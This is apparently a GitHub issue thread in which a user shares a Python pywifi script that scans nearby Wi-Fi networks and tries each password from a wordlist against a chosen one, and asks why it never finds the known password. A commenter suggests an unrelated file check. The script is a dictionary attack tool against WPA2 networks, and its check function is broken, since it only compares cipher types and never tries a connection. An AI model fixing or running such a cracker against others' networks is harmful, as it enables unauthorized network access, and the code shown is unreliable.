### ISSUE TITLE
python

### ISSUE THREAD

**Issue by mhmdataei** [mhmdataei/python-problem#1]
import os
import time
import pywifi

def check_password(wifi,password):
    wifi.password=password
    wifi.akm.append(pywifi.const.AKM_TYPE_WPA2PSK)
    wifiCipher=wifi.cipher
    if wifiCipher==pywifi.const.CIPHER_TYPE_CCMP:
        return True
    else:
        return False
    
password_file=input("Enter the path of the file containing passwords: ")
if not os.path.isfile(password_file) or not os.access(password_file,os.R_OK):
    print("invalid file")
    exit()

with open(password_file,'r') as f:
    passwords=f.read().splitlines()

wifi=pywifi.PyWiFi()
iface=wifi.interfaces()[0]

iface.scan()
networks=iface.scan_results()
print("available networks: ")
for i,network in enumerate(networks):
    print(f"{i+1}.{network.ssid}")

network_index=int(input("Enter the index of the network you want to test: ")) -1

if network_index<0 or network_index>=len(networks):
    print("invalid network index")
else:
    selected_network=networks[network_index]
    print(f"\nTesting passwords for network: {selected_network.ssid}\n")
    for password in passwords:
        print(f"Trying password: {password}")
        if check_password(selected_network,password):
            print(f"\nPassword found: {password}")
            break
    else:
        print("\nNo valid password found")

-do u know why it cant find password even i know the correct password is in that file?

**Comment by ebenezer0311** [comment]
try:
    if not os.path.exists(password_file) or not os.access(password_file, os.R_OK):
        print("invalid file")
        exit()
except FileNotFoundError:
    print("invalid file")
    exit()
    
try this once
